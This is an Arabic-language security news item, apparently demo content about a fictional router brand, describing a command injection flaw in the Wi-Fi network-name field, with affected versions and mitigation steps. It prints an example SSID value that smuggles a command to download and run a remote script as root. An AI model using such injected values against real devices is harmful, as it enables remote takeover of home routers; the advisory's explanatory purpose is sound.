سيبرانا
الثغرات الأمنيةتقرير ثغرةحرجةمحتوى تجريبي

ثغرة حقن أوامر في موجّهات «أوربيتا» المنزلية تنضم إلى قائمة الثغرات المستغلة

CVE-2026-99005 تسمح بتنفيذ أوامر كجذر عبر حقل اسم الشبكة. الاستغلال يتطلب الإدارة عن بُعد مفعّلة، وهي مفعّلة افتراضيًا في الطرازات القديمة.

نُشر
حُدّث:
دقيقة واحدة قراءة
مشاركة:XLinkedInFacebookTelegramWhatsApp
رسم توضيحي مجرد لموجّه شبكة منزلي
رسم توضيحي — سيبرانا (محتوى تجريبي)

أضيفت ثغرة حقن الأوامر في موجّهات «أوربيتا» المنزلية (شركة ومنتج خياليان) إلى قائمة الثغرات المستغلة فعليًا، بعد رصد محاولات استغلال واسعة النطاق تستهدف الأجهزة التي تعرض واجهة الإدارة على الإنترنت.

آلية الثغرة

يُمرَّر حقل اسم الشبكة اللاسلكية إلى أمر نظام لإعادة تشغيل الخدمة دون تنقية. اسم شبكة يحتوي على فاصلة منقوطة يكفي لتنفيذ أي أمر بصلاحيات الجذر:

payload-in-ssid.txt
# مثال توضيحي فقط — القيمة تُحفظ في حقل SSID عبر واجهة الإدارة
HomeWiFi; wget -qO- http://198.51.100.9/x | sh #

من المتأثر؟

الطراز

الإصدارات المتأثرة

الإصلاح

الإدارة عن بُعد افتراضيًا

OR-500

≤ 3.1.9

3.2.0

مفعّلة

OR-700

≤ 3.1.9

3.2.0

معطّلة

ماذا تفعل؟

  1. حدّث البرنامج الثابت إلى 3.2.0 من إعدادات الجهاز أو موقع المورّد.
  2. عطّل الإدارة عن بُعد ما لم تكن ضرورية فعلًا.
  3. أعد ضبط الجهاز إلى إعدادات المصنع إذا لاحظت إعدادات DNS غير معروفة أو بطئًا غير معتاد.
مشاركة:XLinkedInFacebookTelegramWhatsApp
ليلى الحربي

عن الكاتب

ليلى الحربي

رئيسة التحرير

ملف تعريفي تجريبي لأغراض العرض. تغطي «ليلى» الثغرات الأمنية والاستجابة للحوادث، وتشرف على السياسة التحريرية وعمليات التحقق.

  • الثغرات الأمنية
  • الاستجابة للحوادث
  • السياسة التحريرية
كل مقالات ليلى الحربي